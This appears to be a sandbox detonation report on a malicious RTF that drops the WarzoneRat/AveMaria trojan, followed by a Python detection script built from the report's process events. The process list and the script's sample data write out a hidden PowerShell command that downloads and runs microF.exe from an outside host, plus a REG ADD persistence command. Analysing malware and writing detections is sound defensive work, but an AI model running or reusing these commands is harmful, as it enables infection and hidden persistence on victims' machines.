| N/A | 91.189.91.157:123 | ntp.ubuntu.com | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
debian9-mipsel
Max time kernel
0s
Max time network
10s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 162.159.200.123:123 | 2.debian.pool.ntp.org | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
149s
Max time network
194s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
WarzoneRat, AveMaria
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Sets DLL path for service in the registry
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\xhdvvza = "0" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\rfxvmt.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1956 set thread context of 240 | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | C:\Users\Admin\AppData\Local\Temp\microF.exe |
| PID 1904 set thread context of 752 | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | C:\Users\Admin\AppData\Local\Temp\microF.exe |
| PID 364 set thread context of 1656 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
| PID 1604 set thread context of 1752 | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Microsoft DN1\sqlmap.dll | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| File created | C:\Program Files\Microsoft DN1\rdpwrap.ini | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\microF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"
C:\Users\Admin\AppData\Roaming\microF.exe
"C:\Users\Admin\AppData\Roaming\microF.exe"
C:\Users\Admin\AppData\Roaming\microF.exe
"C:\Users\Admin\AppData\Roaming\microF.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Users\Admin\AppData\Local\Temp\microF.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe
"C:\Users\Admin\AppData\Roaming\cCBy.blyi.exe"
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
C:\Users\Admin\AppData\Local\Temp\cCBy.blyi.exe
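The process list above shows the full delivery chain in one place: WINWORD.EXE opens the RTF, a hidden PowerShell with `-ExecutionPolicy bypass` fetches `microF.exe` over plain HTTP (note the mixed-case `httP://` scheme, a trivial evasion of case-sensitive string matches) and starts it, and the dropped binary persists through `reg.exe` by writing the `Load` value under `HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows`, a legacy logon-time autostart that many Run-key audits overlook (MITRE ATT&CK T1547.001 lists it). The following is an added detection example, not code from the sandbox or the report; the process events are constructed from the command lines above, and the parent/child pairing is an assumption because the report prints spawn order but not parent PIDs.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events transcribed from the report's process list.
# "parent" values are assumed from the listing order; the report itself prints no parent PIDs.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",  # assumed launcher of Word
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\52969fae09c2428c701a8b51a20c1eb07bab1bca79acb21eaa910d764533155d.rtf"'},
    {"parent": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://hutyrtit.ydns.eu/microF.exe','C:\Users\Admin\AppData\Roaming\microF.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\microF.exe'"'''},
    {"parent": r"C:\Users\Admin\AppData\Local\Temp\microF.exe",
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r'REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"'},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# WebClient.DownloadFile('<url>','<destination>') with either quoting style.
CRADLE_RE = re.compile(r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dst>[^']+)'\s*\)", re.IGNORECASE)
# REG ADD against the legacy Winlogon "Load" autostart value.
LOAD_RE = re.compile(
    r'REG\s+ADD\s+"?HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows"?'
    r'\s+.*?/v\s+Load\b.*?/d\s+"?(?P<path>[^"]+)"?', re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
BYPASS_RE = re.compile(r"-e(?:p|xecutionpolicy)?\s+bypass", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events) -> list:
    """Run the four behavioural rules over process-creation events and return findings."""
    findings = []
    for ev in events:
        image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append(Finding("office_spawns_script_host", f"{parent} -> {image}"))
        if image == "powershell.exe" and HIDDEN_RE.search(cmd) and BYPASS_RE.search(cmd):
            findings.append(Finding("powershell_hidden_bypass", cmd[:60]))
        m = CRADLE_RE.search(cmd)
        if m:
            # Normalise the scheme so a mixed-case "httP://" does not slip past exact matching.
            scheme, _, rest = m["url"].partition("://")
            findings.append(Finding("powershell_download_cradle", f"{scheme.lower()}://{rest} -> {m['dst']}"))
        m = LOAD_RE.search(cmd)
        if m:
            findings.append(Finding("winlogon_windows_load_persistence", m["path"]))
    return findings


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"{f.rule:36} {f.detail}")
```

The `Load` rule fires twice here, once for the `cmd.exe /c` wrapper and once for the `reg.exe` child, which is what you want when either parent may be missing from the telemetry. In a real hunt the same `Load` and `Run` values should also be read directly from every loaded user hive, since the REG ADD command line is only visible if process auditing captured it.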
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | hutyrtit.ydns.eu | udp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 203.159.80.107:80 | hutyrtit.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | sdafsdffssffs.ydns.eu | udp |
| N/A | 203.159.80.107:6703 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 203.159.80.107:80 | sdafsdffssffs.ydns.eu | tcp |
| N/A | 8.8.8.8:53 | checkip.dyndns.org | udp |
| N/A | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 172.67.188.154:443 | freegeoip.app | tcp |
Files
memory/1724-60-0x0000000072C71000-0x0000000072C74000-memory.dmp
memory/1724-61-0x00000000706F1000-0x00000000706F3000-memory.dmp
memory/1724-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1724-63-0x00000000769B1000-0x00000000769B3000-memory.dmp
memory/976-64-0x0000000000000000-mapping.dmp
memory/976-66-0x0000000000910000-0x0000000000911000-memory.dmp
memory/976-67-0x0000000004850000-0x0000000004851000-memory.dmp
memory/976-68-0x0000000000830000-0x0000000000831000-memory.dmp
memory/976-69-0x0000000000832000-0x0000000000833000-memory.dmp
memory/976-70-0x0000000001050000-0x0000000001051000-memory.dmp
memory/976-71-0x0000000004790000-0x0000000004791000-memory.dmp
memory/1140-72-0x0000000000000000-mapping.dmp
memory/992-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | d5941f190fb2c6b016623502e60e1673 |
| SHA1 | d234176d1abbf2cdb5e42bdcab6e5b06c1299dff |
| SHA256 | 19b224db27068793f3dc049433d155a665b8153195cc050817b5bddca0386941 |
| SHA512 | 7bde15ea0b9c4a60cef478c7cc030a6daed10886825d216cc535eca4c4e5082982d00105c30cbcda5580413913ad254139fb8c0d6411baddb12be2ca7529947b |
memory/976-78-0x0000000005FE0000-0x0000000005FE1000-memory.dmp
memory/976-89-0x00000000060B0000-0x00000000060B1000-memory.dmp
memory/976-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
memory/992-93-0x0000000004A12000-0x0000000004A13000-memory.dmp
memory/992-92-0x0000000004A10000-0x0000000004A11000-memory.dmp
memory/1140-91-0x00000000049A0000-0x00000000049A1000-memory.dmp
memory/976-95-0x00000000060E0000-0x00000000060E1000-memory.dmp
memory/976-102-0x0000000005FB0000-0x0000000005FB1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
| MD5 | b6d38f250ccc9003dd70efd3b778117f |
| SHA1 | d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a |
| SHA256 | 4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265 |
| SHA512 | 67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | aabbfd45df18371a10ffdeec237f4ab6 |
| SHA1 | b79bc62b78a813ad38c77e39aafe42bcce12361f |
| SHA256 | 5458ef0fe3bceee8b6b84a7f2198915328766117ccf9937e88aa2e40f7c0cacb |
| SHA512 | c7699d7d230758f867a8017aede4498963838f2e7016903bd1ee13090c213036381330ef89f26406d9d33194ae79250538272916faa3930eb05a5ad58b2d71f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
| MD5 | 75a8da7754349b38d64c87c938545b1b |
| SHA1 | 5c28c257d51f1c1587e29164cc03ea880c21b417 |
| SHA256 | bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96 |
| SHA512 | 798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643 |
memory/976-110-0x00000000062A0000-0x00000000062A1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
| MD5 | be4d72095faf84233ac17b94744f7084 |
| SHA1 | cc78ce5b9c57573bd214a8f423ee622b00ebb1ec |
| SHA256 | b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc |
| SHA512 | 43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
| MD5 | 5e3c7184a75d42dda1a83606a45001d8 |
| SHA1 | 94ca15637721d88f30eb4b6220b805c5be0360ed |
| SHA256 | 8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59 |
| SHA512 | fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
| MD5 | df44874327d79bd75e4264cb8dc01811 |
| SHA1 | 1396b06debed65ea93c24998d244edebd3c0209d |
| SHA256 | 55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181 |
| SHA512 | 95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
| MD5 | 02ff38ac870de39782aeee04d7b48231 |
| SHA1 | 0390d39fa216c9b0ecdb38238304e518fb2b5095 |
| SHA256 | fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876 |
| SHA512 | 24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
| MD5 | a725bb9fafcf91f3c6b7861a2bde6db2 |
| SHA1 | 8bb5b83f3cc37ff1e5ea4f02acae38e72364c114 |
| SHA256 | 51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431 |
| SHA512 | 1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
| MD5 | 597009ea0430a463753e0f5b1d1a249e |
| SHA1 | 4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62 |
| SHA256 | 3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d |
| SHA512 | 5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 124a46201ef78cfbf1b6ca42b9258e98 |
| SHA1 | d926ff2529378e404d1be111c055950c47d7313a |
| SHA256 | 862a5e44d2ca4d4f785b7a97f42ef3e44fbd9a9ed44c7edce86139b2135bfc3f |
| SHA512 | 91af241ef8ea7ebce9d55a20d6147a4773d335996ad966bb7c951bb7cd8f0729d1c133205c9031f47699976b976121b2cb4b3f01393d54cd41a44b352b119272 |
\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1956-116-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
| SHA512 | 96570f3a334448cce354a784c3f9d43594a21329d2784dc459b6cc27aaba6b5132fa2d0a4b889cbdaa75394cf1c6c1bebcd5ee694f7f0528a398665c611bf936 |
memory/1956-119-0x0000000000C20000-0x0000000000C21000-memory.dmp
memory/1956-121-0x0000000004830000-0x0000000004831000-memory.dmp
memory/1904-123-0x0000000000000000-mapping.dmp
memory/992-122-0x0000000005970000-0x0000000005971000-memory.dmp
memory/1904-127-0x0000000004C10000-0x0000000004C11000-memory.dmp
memory/820-128-0x0000000000000000-mapping.dmp
memory/820-129-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp
memory/1904-130-0x0000000004280000-0x00000000042D7000-memory.dmp
memory/1904-139-0x00000000050E0000-0x000000000515B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\microF.exe
| MD5 | 100c3e2649fd32ce6d7e108e1a2ebf0d |
| SHA1 | 7f6c8fab6fa84ad9f12d4cf08cb684d525073230 |
| SHA256 | 29a4c97029dcf52e73bb65d748d1fd6194c5f7f72fe8c272320bbe38636e0f3a |
